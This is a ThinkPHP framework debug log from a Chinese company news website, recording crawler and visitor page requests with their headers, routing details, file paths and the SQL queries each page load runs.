/data/admin/allowurl.txt [ info ] www.kinsana.cn/data/admin/allowurl.txt [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,069.97kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'data', 1 => 'admin', 2 => 'allowurl.txt', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.kinsana.cn', 'accept-language' => 'zh-cn,zh,en', 'accept-encoding' => 'gzip,deflate', 'referer' => 'http://www.kinsana.cn/data/admin/allowurl.txt', 'user-agent' => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)', 'accept' => '*/*', ) [ info ] [ PARAM ] array ( '/data/admin/allowurl_txt' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T08:25:58+08:00 ] 54.36.149.48 GET /index/news/xwxq/id/63.html [ info ] www.kinsana.cn/index/news/xwxq/id/63.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,171.97kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/63_html' => '', 'id' => '63', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 63 LIMIT 1 [ RunTime:0.015625s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 63 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T08:30:20+08:00 ] 106.11.155.113 GET /static/css/swiper-3.4.2.min.css [ info ] www.kinsana.cn/static/css/swiper-3.4.2.min.css [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,069.27kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'static', 1 => 'css', 2 => 'swiper-3.4.2.min.css', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'YisouSpider', 'referer' => 'http://www.kinsana.cn/', 'host' => 'www.kinsana.cn', 'accept-language' => 'zh-CN,zh-TW;q=0.9,zh;q=0.8,en;q=0.7', 'accept-encoding' => 'gzip', 'accept' => '*/*', ) [ info ] [ PARAM ] array ( '/static/css/swiper-3_4_2_min_css' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T09:09:04+08:00 ] 106.11.152.53 GET /index/news/xwxq/id/68.html [ info ] www.kinsana.cn/index/news/xwxq/id/68.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,173.95kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/68_html' => '', 'id' => '68', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 68 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 68 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T09:30:28+08:00 ] 123.123.219.36 GET /index/news/xwxq/id/136.html [ info ] www.kinsana.cn/index/news/xwxq/id/136.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,199.84kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'if-modified-since' => 'Wed, 08 Jul 2020 03:14:15 GMT', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-charset' => 'utf-8,iso-8859-1;q=0.7,*;q=0.7', 'accept-language' => 'zh-CN,zh;q=0.8,en-us,en-gb,en;q=0.7,*;q=0.3', 'user-agent' => 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36', 'accept-encoding' => 'x-gzip, gzip, deflate', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/136_html' => '', 'id' => '136', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 136 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 136 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T09:37:19+08:00 ] 220.181.108.103 GET /index/news/xwxq/id/184.html [ info ] www.kinsana.cn/index/news/xwxq/id/184.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,175.74kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/184_html' => '', 'id' => '184', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 184 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 184 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T09:41:41+08:00 ] 112.43.149.221 GET /favicon.ico [ info ] www.kinsana.cn/favicon.ico [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,070.77kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.kinsana.cn', 'apn-type' => '1-0', 'accept-encoding' => 'gzip', 'user-agent' => 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; HMA-AL00 Build/HUAWEIHMA-AL00) AppleWebKit/533.1 (KHTML, like Gecko) Mobile Safari/533.1', 'accept' => 'application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6', 'q-ua2' => 'QV=3&PL=ADR&PR=QB&PP=com.tencent.mtt&PPVN=11.7.5.5054&TBSVC=45001&CO=BK&COVC=045710&PB=GE&VE=B1&DE=PHONE&CHID=0&LCID=14086&MO= HMA-AL00 &RL=1080*2163&OS=10&API=29&DS=64&RT=32&HM=1&HMVN=&REF=qb_0&TM=00', ) [ info ] [ PARAM ] array ( '/favicon_ico' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T09:41:41+08:00 ] 112.43.149.221 GET /favicon.ico [ info ] www.kinsana.cn/favicon.ico [运行时间:0.031250s][吞吐率:32.00req/s] [内存消耗:1,070.77kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.kinsana.cn', 'apn-type' => '1-0', 'accept-encoding' => 'gzip', 'user-agent' => 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; HMA-AL00 Build/HUAWEIHMA-AL00) AppleWebKit/533.1 (KHTML, like Gecko) Mobile Safari/533.1', 'accept' => 'application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6', 'q-ua2' => 'QV=3&PL=ADR&PR=QB&PP=com.tencent.mtt&PPVN=11.7.5.5054&TBSVC=45001&CO=BK&COVC=045710&PB=GE&VE=B1&DE=PHONE&CHID=0&LCID=14086&MO= HMA-AL00 &RL=1080*2163&OS=10&API=29&DS=64&RT=32&HM=1&HMVN=&REF=qb_0&TM=00', ) [ info ] [ PARAM ] array ( '/favicon_ico' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T09:41:42+08:00 ] 112.43.149.221 GET /favicon.ico [ info ] www.kinsana.cn/favicon.ico [运行时间:0.031250s][吞吐率:32.00req/s] [内存消耗:1,070.77kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.kinsana.cn', 'apn-type' => '1-0', 'accept-encoding' => 'gzip', 'user-agent' => 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; HMA-AL00 Build/HUAWEIHMA-AL00) AppleWebKit/533.1 (KHTML, like Gecko) Mobile Safari/533.1', 'accept' => 'application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6', 'q-ua2' => 'QV=3&PL=ADR&PR=QB&PP=com.tencent.mtt&PPVN=11.7.5.5054&TBSVC=45001&CO=BK&COVC=045710&PB=GE&VE=B1&DE=PHONE&CHID=0&LCID=14086&MO= HMA-AL00 &RL=1080*2163&OS=10&API=29&DS=64&RT=32&HM=1&HMVN=&REF=qb_0&TM=00', ) [ info ] [ PARAM ] array ( '/favicon_ico' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T09:41:43+08:00 ] 112.43.149.221 GET /favicon.ico [ info ] www.kinsana.cn/favicon.ico [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,070.77kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.kinsana.cn', 'apn-type' => '1-0', 'accept-encoding' => 'gzip', 'user-agent' => 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; HMA-AL00 Build/HUAWEIHMA-AL00) AppleWebKit/533.1 (KHTML, like Gecko) Mobile Safari/533.1', 'accept' => 'application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6', 'q-ua2' => 'QV=3&PL=ADR&PR=QB&PP=com.tencent.mtt&PPVN=11.7.5.5054&TBSVC=45001&CO=BK&COVC=045710&PB=GE&VE=B1&DE=PHONE&CHID=0&LCID=14086&MO= HMA-AL00 &RL=1080*2163&OS=10&API=29&DS=64&RT=32&HM=1&HMVN=&REF=qb_0&TM=00', ) [ info ] [ PARAM ] array ( '/favicon_ico' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T09:42:59+08:00 ] 118.184.177.56 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T09:51:55+08:00 ] 54.36.148.224 GET /index/news/xwxq/id/210.html [ info ] www.kinsana.cn/index/news/xwxq/id/210.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,201.14kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/210_html' => '', 'id' => '210', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 210 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 210 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T09:55:31+08:00 ] 123.125.186.68 GET /index/news/xwxq/id/137.html [ info ] www.kinsana.cn/index/news/xwxq/id/137.html [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,176.24kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/137_html' => '', 'id' => '137', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 137 LIMIT 1 [ RunTime:0.031250s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 137 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T10:00:17+08:00 ] 207.46.13.117 GET / [ info ] www.kinsana.cn/ [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,016.36kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'host' => 'www.kinsana.cn', 'from' => 'bingbot(at)microsoft.com', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'pragma' => 'no-cache', 'connection' => 'close', 'cache-control' => 'no-cache', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.015625s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T10:11:17+08:00 ] 36.110.147.77 GET /index/news/xwxq/id/19.html [ info ] www.kinsana.cn/index/news/xwxq/id/19.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,044.62kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/19_html' => '', 'id' => '19', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 19 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T10:23:30+08:00 ] 185.191.171.19 GET /index/news/hydtnews.html?page=28 [ info ] xn--vhqsn14am88k.com/index/news/hydtnews.html?page=28 [运行时间:0.437500s][吞吐率:2.29req/s] [内存消耗:2,073.21kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'hydtnews', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/hydtnews_html' => '', 'page' => '28', ) [ info ] [ RUN ] app\index\controller\News->hydtnews[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\hydtnews.htm [ array ( 0 => 'newRes', 1 => 'page', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `news` WHERE `cate_id` = '2' AND `state` = '1' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 216,8 [ RunTime:0.296875s ] --------------------------------------------------------------- [ 2021-07-16T10:34:06+08:00 ] 106.11.159.61 GET /index/news/spnews.html [ info ] www.kinsana.cn/index/news/spnews.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,333.65kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'spnews', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/spnews_html' => '', ) [ info ] [ RUN ] app\index\controller\News->spnews[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\spnews.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 